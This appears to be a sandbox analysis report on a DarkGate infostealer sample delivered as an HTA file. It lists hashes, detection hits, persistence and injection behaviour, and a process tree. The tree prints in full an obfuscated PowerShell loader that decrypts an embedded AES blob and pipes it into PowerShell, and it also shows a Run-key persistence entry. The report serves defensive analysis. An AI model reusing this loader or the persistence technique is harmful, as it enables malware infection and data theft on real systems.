darkgate | fd77b8c213b4a3629abca71de153ddb41b49eff69d781b2222efc16cec7dd04b

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
05-02-2024 14:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

05022024_2209_singer.hta
Size

72KB
MD5

85c97d1919e8f1936ff6930495892788
SHA1

c547a5c5781d415bbec71189c48ac465a14514a1
SHA256

fd77b8c213b4a3629abca71de153ddb41b49eff69d781b2222efc16cec7dd04b
SHA512

618ebfb23e191c6b03da8ff1e2eca1db378c2ba0f1475d927d00c3a3459e18345c597901d6c622b6e7697db2739924911c9c8ff9d62d19e23dd0e5bb74f45c78
SSDEEP

768:W5sZHTGIH559B0P2pD4Lxj3COqibKnZw/OMN38u1LuvLutoLuV6lYWlY6CJNc1nT:syHKIHz9KP2SLxzj2LBdti5Oz

Score

10^/10

darkgate persistence stealer

Malware Config

Signatures

DarkGate
DarkGate is an infostealer written in C++.
stealer darkgate

Detect DarkGate stealer 41 IoCs

resource	yara_rule
behavioral2/memory/1756-105-0x00000000056E0000-0x0000000005A2E000-memory.dmp	family_darkgate_v6
behavioral2/memory/2024-153-0x0000000000400000-0x0000000000470000-memory.dmp	family_darkgate_v6
behavioral2/memory/2024-152-0x0000000000400000-0x0000000000470000-memory.dmp	family_darkgate_v6
behavioral2/memory/2024-154-0x0000000000400000-0x0000000000470000-memory.dmp	family_darkgate_v6
behavioral2/memory/2024-157-0x0000000000400000-0x0000000000470000-memory.dmp	family_darkgate_v6
behavioral2/memory/1756-161-0x00000000056E0000-0x0000000005A2E000-memory.dmp	family_darkgate_v6
behavioral2/memory/2024-168-0x0000000000400000-0x0000000000470000-memory.dmp	family_darkgate_v6
behavioral2/memory/2024-171-0x0000000000400000-0x0000000000470000-memory.dmp	family_darkgate_v6
behavioral2/memory/2024-174-0x0000000000400000-0x0000000000470000-memory.dmp	family_darkgate_v6
behavioral2/memory/2024-175-0x0000000000400000-0x0000000000470000-memory.dmp	family_darkgate_v6
behavioral2/memory/528-177-0x0000000000400000-0x0000000000470000-memory.dmp	family_darkgate_v6
behavioral2/memory/528-179-0x0000000000400000-0x0000000000470000-memory.dmp	family_darkgate_v6
behavioral2/memory/528-181-0x0000000000400000-0x0000000000470000-memory.dmp	family_darkgate_v6
behavioral2/memory/208-207-0x0000000000400000-0x0000000000470000-memory.dmp	family_darkgate_v6
behavioral2/memory/208-285-0x0000000000400000-0x0000000000470000-memory.dmp	family_darkgate_v6
behavioral2/memory/2024-286-0x0000000000400000-0x0000000000470000-memory.dmp	family_darkgate_v6
behavioral2/memory/2024-293-0x0000000000400000-0x0000000000470000-memory.dmp	family_darkgate_v6
behavioral2/memory/208-294-0x0000000000400000-0x0000000000470000-memory.dmp	family_darkgate_v6
behavioral2/memory/2024-295-0x0000000000400000-0x0000000000470000-memory.dmp	family_darkgate_v6
behavioral2/memory/2024-302-0x0000000000400000-0x0000000000470000-memory.dmp	family_darkgate_v6
behavioral2/memory/208-303-0x0000000000400000-0x0000000000470000-memory.dmp	family_darkgate_v6
behavioral2/memory/208-311-0x0000000000400000-0x0000000000470000-memory.dmp	family_darkgate_v6
behavioral2/memory/2024-312-0x0000000000400000-0x0000000000470000-memory.dmp	family_darkgate_v6
behavioral2/memory/208-320-0x0000000000400000-0x0000000000470000-memory.dmp	family_darkgate_v6
behavioral2/memory/2024-321-0x0000000000400000-0x0000000000470000-memory.dmp	family_darkgate_v6
behavioral2/memory/2024-329-0x0000000000400000-0x0000000000470000-memory.dmp	family_darkgate_v6
behavioral2/memory/208-330-0x0000000000400000-0x0000000000470000-memory.dmp	family_darkgate_v6
behavioral2/memory/208-338-0x0000000000400000-0x0000000000470000-memory.dmp	family_darkgate_v6
behavioral2/memory/2024-339-0x0000000000400000-0x0000000000470000-memory.dmp	family_darkgate_v6
behavioral2/memory/208-347-0x0000000000400000-0x0000000000470000-memory.dmp	family_darkgate_v6
behavioral2/memory/2024-348-0x0000000000400000-0x0000000000470000-memory.dmp	family_darkgate_v6
behavioral2/memory/208-356-0x0000000000400000-0x0000000000470000-memory.dmp	family_darkgate_v6
behavioral2/memory/2024-357-0x0000000000400000-0x0000000000470000-memory.dmp	family_darkgate_v6
behavioral2/memory/2024-365-0x0000000000400000-0x0000000000470000-memory.dmp	family_darkgate_v6
behavioral2/memory/208-366-0x0000000000400000-0x0000000000470000-memory.dmp	family_darkgate_v6
behavioral2/memory/2024-374-0x0000000000400000-0x0000000000470000-memory.dmp	family_darkgate_v6
behavioral2/memory/208-375-0x0000000000400000-0x0000000000470000-memory.dmp	family_darkgate_v6
behavioral2/memory/208-383-0x0000000000400000-0x0000000000470000-memory.dmp	family_darkgate_v6
behavioral2/memory/2024-384-0x0000000000400000-0x0000000000470000-memory.dmp	family_darkgate_v6
behavioral2/memory/208-392-0x0000000000400000-0x0000000000470000-memory.dmp	family_darkgate_v6
behavioral2/memory/2024-393-0x0000000000400000-0x0000000000470000-memory.dmp	family_darkgate_v6

Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs

description	pid	Process	procid_target
PID 1756 created 4596	1756	Autoit3.exe	57
PID 1756 created 612	1756	Autoit3.exe	6
PID 2024 created 4820	2024	vbc.exe	98
PID 2024 created 2768	2024	vbc.exe	31

Blocklisted process makes network request 2 IoCs

flow	pid	Process
15	1312	powershell.exe
18	1312	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation	mshta.exe

Executes dropped EXE 1 IoCs

pid	Process
1756	Autoit3.exe

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\aebaeeb = "C:\\ProgramData\\bdhhcbh\\Autoit3.exe C:\\ProgramData\\bdhhcbh\\adaacee.au3"	vbc.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 1756 set thread context of 2024	1756	Autoit3.exe	107
PID 2024 set thread context of 528	2024	vbc.exe	108
PID 2024 set thread context of 208	2024	vbc.exe	109

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 10 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	vbc.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	vbc.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	vbc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	vbc.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Autoit3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Autoit3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	vbc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	vbc.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 41 IoCs

pid	Process
1460	powershell.exe
1460	powershell.exe
1312	powershell.exe
1312	powershell.exe
1756	Autoit3.exe
1756	Autoit3.exe
1756	Autoit3.exe
1756	Autoit3.exe
1756	Autoit3.exe
1756	Autoit3.exe
1756	Autoit3.exe
1756	Autoit3.exe
2024	vbc.exe
2024	vbc.exe
2024	vbc.exe
2024	vbc.exe
528	vbc.exe
2024	vbc.exe
2024	vbc.exe
876	AcroRd32.exe
876	AcroRd32.exe
876	AcroRd32.exe
876	AcroRd32.exe
876	AcroRd32.exe
876	AcroRd32.exe
876	AcroRd32.exe
876	AcroRd32.exe
876	AcroRd32.exe
876	AcroRd32.exe
876	AcroRd32.exe
876	AcroRd32.exe
876	AcroRd32.exe
876	AcroRd32.exe
876	AcroRd32.exe
876	AcroRd32.exe
876	AcroRd32.exe
876	AcroRd32.exe
876	AcroRd32.exe
876	AcroRd32.exe
208	vbc.exe
208	vbc.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2024	vbc.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1460	powershell.exe
Token: SeDebugPrivilege	1312	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
876	AcroRd32.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
876	AcroRd32.exe
876	AcroRd32.exe
876	AcroRd32.exe
876	AcroRd32.exe
876	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3744 wrote to memory of 1460	3744	mshta.exe	86
PID 3744 wrote to memory of 1460	3744	mshta.exe	86
PID 3744 wrote to memory of 1460	3744	mshta.exe	86
PID 1460 wrote to memory of 1312	1460	powershell.exe	90
PID 1460 wrote to memory of 1312	1460	powershell.exe	90
PID 1460 wrote to memory of 1312	1460	powershell.exe	90
PID 1312 wrote to memory of 876	1312	powershell.exe	94
PID 1312 wrote to memory of 876	1312	powershell.exe	94
PID 1312 wrote to memory of 876	1312	powershell.exe	94
PID 1312 wrote to memory of 1756	1312	powershell.exe	97
PID 1312 wrote to memory of 1756	1312	powershell.exe	97
PID 1312 wrote to memory of 1756	1312	powershell.exe	97
PID 876 wrote to memory of 4820	876	AcroRd32.exe	98
PID 876 wrote to memory of 4820	876	AcroRd32.exe	98
PID 876 wrote to memory of 4820	876	AcroRd32.exe	98
PID 4820 wrote to memory of 4584	4820	RdrCEF.exe	99
PID 4820 wrote to memory of 4584	4820	RdrCEF.exe	99
PID 4820 wrote to memory of 4584	4820	RdrCEF.exe	99
PID 4820 wrote to memory of 4584	4820	RdrCEF.exe	99
PID 4820 wrote to memory of 4584	4820	RdrCEF.exe	99
PID 4820 wrote to memory of 4584	4820	RdrCEF.exe	99
PID 4820 wrote to memory of 4584	4820	RdrCEF.exe	99
PID 4820 wrote to memory of 4584	4820	RdrCEF.exe	99
PID 4820 wrote to memory of 4584	4820	RdrCEF.exe	99
PID 4820 wrote to memory of 4584	4820	RdrCEF.exe	99
PID 4820 wrote to memory of 4584	4820	RdrCEF.exe	99
PID 4820 wrote to memory of 4584	4820	RdrCEF.exe	99
PID 4820 wrote to memory of 4584	4820	RdrCEF.exe	99
PID 4820 wrote to memory of 4584	4820	RdrCEF.exe	99
PID 4820 wrote to memory of 4584	4820	RdrCEF.exe	99
PID 4820 wrote to memory of 4584	4820	RdrCEF.exe	99
PID 4820 wrote to memory of 4584	4820	RdrCEF.exe	99
PID 4820 wrote to memory of 4584	4820	RdrCEF.exe	99
PID 4820 wrote to memory of 4584	4820	RdrCEF.exe	99
PID 4820 wrote to memory of 4584	4820	RdrCEF.exe	99
PID 4820 wrote to memory of 4584	4820	RdrCEF.exe	99
PID 4820 wrote to memory of 4584	4820	RdrCEF.exe	99
PID 4820 wrote to memory of 4584	4820	RdrCEF.exe	99
PID 4820 wrote to memory of 4584	4820	RdrCEF.exe	99
PID 4820 wrote to memory of 4584	4820	RdrCEF.exe	99
PID 4820 wrote to memory of 4584	4820	RdrCEF.exe	99
PID 4820 wrote to memory of 4584	4820	RdrCEF.exe	99
PID 4820 wrote to memory of 4584	4820	RdrCEF.exe	99
PID 4820 wrote to memory of 4584	4820	RdrCEF.exe	99
PID 4820 wrote to memory of 4584	4820	RdrCEF.exe	99
PID 4820 wrote to memory of 4584	4820	RdrCEF.exe	99
PID 4820 wrote to memory of 4584	4820	RdrCEF.exe	99
PID 4820 wrote to memory of 4584	4820	RdrCEF.exe	99
PID 4820 wrote to memory of 4584	4820	RdrCEF.exe	99
PID 4820 wrote to memory of 4584	4820	RdrCEF.exe	99
PID 4820 wrote to memory of 4584	4820	RdrCEF.exe	99
PID 4820 wrote to memory of 4584	4820	RdrCEF.exe	99
PID 4820 wrote to memory of 4584	4820	RdrCEF.exe	99
PID 4820 wrote to memory of 4584	4820	RdrCEF.exe	99
PID 4820 wrote to memory of 4584	4820	RdrCEF.exe	99
PID 4820 wrote to memory of 4584	4820	RdrCEF.exe	99
PID 4820 wrote to memory of 3520	4820	RdrCEF.exe	100
PID 4820 wrote to memory of 3520	4820	RdrCEF.exe	100
PID 4820 wrote to memory of 3520	4820	RdrCEF.exe	100
PID 4820 wrote to memory of 3520	4820	RdrCEF.exe	100
PID 4820 wrote to memory of 3520	4820	RdrCEF.exe	100
PID 4820 wrote to memory of 3520	4820	RdrCEF.exe	100
PID 4820 wrote to memory of 3520	4820	RdrCEF.exe	100
PID 4820 wrote to memory of 3520	4820	RdrCEF.exe	100

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:612
- \??\c:\windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
  c:\windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Suspicious use of SetThreadContext
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  PID:2024

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
PID:2768
- \??\c:\windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
  c:\windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
  2⤵
  - Adds Run key to start application
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  PID:208

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca
1⤵
PID:4596

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\05022024_2209_singer.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3744
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gPcKLP = 'AAAAAAAAAAAAAAAAAAAAAEOe1cGTw6FIhVh/QrSMTFJsLkEmx+7VpDV75soo44Xjdoou/gadRv2ptrh1eyowo32jDkJQWIknw9z9eGEASjim8eUsr+iiDt+Gct7uUpEmFrWCP76BB1Cg0KKx0WQlrQJPpv8tYcP+nuI68unNsQgKBhhaMqg4Ou8fdShXjyIUb1O1Cb9CmKoPd891C0RQ3y4FWa07shVCaJHnFdmVEvjhxagF1qVUsx6xC6YMgl3nja922t2x/5SOyqfXR5JLkG6Xb6sKuNaR6QGS2SqteqIAE1vfs9GxXoIUJdarAKngnf1EEFUrDfctZlSR5zT6GLBAZ3kgFZgXH5XxlTf6tcteKZwZS+5X4SlH/spRa84FoPzGZg97K06YSPSft9fcpt7VRhi8ReddyJySyS4F80ZNbvJJrKX7afVObWkzQoASpxWcmgNOQpGJ4ismROQ028geyBvMpcF0Na2L2+fA8kTj6MFPTXF5ELvcldBetLM7umjFZu48uOtlUGPiZSI5Wi1z6pUaJxT8IwxgmefwtXqgTkSXxhfyZoOpb36yMcXCa9W5n0MeGRnBsFFZMawKjOI7HFvVWQhnEXb7yh4kDtwkLDbhOJXtwkeLWJN/OOxEEiA/dza1N5jbhWku9IFWIe/rbKblK7A859gC/pjQd5h0qz4rBdgieeO3GGFAkETIhs+3J1NcMZSf/zbVERD7tY7Mat17qjwa4pFiS8KLv7KI9cYLR/mrJDzBBNXWLqZiJunl8sSYoAdNKNS5niyohs7B3HV73Nf91Mf9GCXDNjt5BcGqqFFHiW6qlxM166yQ41WBsSZP77t/XhpZNGmRPhx84Cfqap6AYmu/N3KfsnY7HQLGmgn9hVJRLskm9I0zf83dhSATZUDBTyCbWPgYaWmWi5LnYe2qtPULS/UhIh4ETTgc33roMdNgLk8Ssfwbt1kqev2L8aSn+FqgADYkufhXrehPAhR+LFQkn9ePGHwMzPxsEVETt2GkqztZUPUx';$EbCNQP = 'S01NeWhUamJYR1B5aWZyUnpwd0lGQXhYUnlvQW11QkI=';$nbGhvR = New-Object 'System.Security.Cryptography.AesManaged';$nbGhvR.Mode = [System.Security.Cryptography.CipherMode]::ECB;$nbGhvR.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$nbGhvR.BlockSize = 128;$nbGhvR.KeySize = 256;$nbGhvR.Key = [System.Convert]::FromBase64String($EbCNQP);$Tpgvz = [System.Convert]::FromBase64String($gPcKLP);$gBOLPdWT = $Tpgvz[0..15];$nbGhvR.IV = $gBOLPdWT;$QcGcbsNZr = $nbGhvR.CreateDecryptor();$RaMEzyHzB = $QcGcbsNZr.TransformFinalBlock($Tpgvz, 16, $Tpgvz.Length - 16);$nbGhvR.Dispose();$tlVz = New-Object System.IO.MemoryStream( , $RaMEzyHzB );$znrzbVZ = New-Object System.IO.MemoryStream;$GdzwFAYYz = New-Object System.IO.Compression.GzipStream $tlVz, ([IO.Compression.CompressionMode]::Decompress);$GdzwFAYYz.CopyTo( $znrzbVZ );$GdzwFAYYz.Close();$tlVz.Close();[byte[]] $mYCOjpH = $znrzbVZ.ToArray();$iMhDGLOW = [System.Text.Encoding]::UTF8.GetString($mYCOjpH);$iMhDGLOW | powershell -
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1460
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
    3⤵
    - Blocklisted process makes network request
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1312
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\p1345.pdf"
      4⤵
      Checks processor information in registry
      Modifies Internet Explorer settings
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:876
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4820
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=8B029953C0BAA76F21624AF8DC16767F --mojo-platform-channel-handle=1736 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        6⤵
        
        PID:4584
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=391497A035DD7512DB0A89D1B99B8367 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=391497A035DD7512DB0A89D1B99B8367 --renderer-client-id=2 --mojo-platform-channel-handle=1760 --allow-no-sandbox-job /prefetch:1
        6⤵
        
        PID:3520
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=BC8B604AA7AD51F0A4DBED6A3E5CF3F5 --mojo-platform-channel-handle=2296 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        6⤵
        
        PID:4604
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=C9CA63ADC4F84FB99805C90E71B70A3A --mojo-platform-channel-handle=1808 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        6⤵
        
        PID:4552
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=D7455CA0ED12E0688A51F365F624FF75 --mojo-platform-channel-handle=2448 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        6⤵
        
        PID:4560
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=C09F4176AA5833997C07D51D3FF35E4C --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6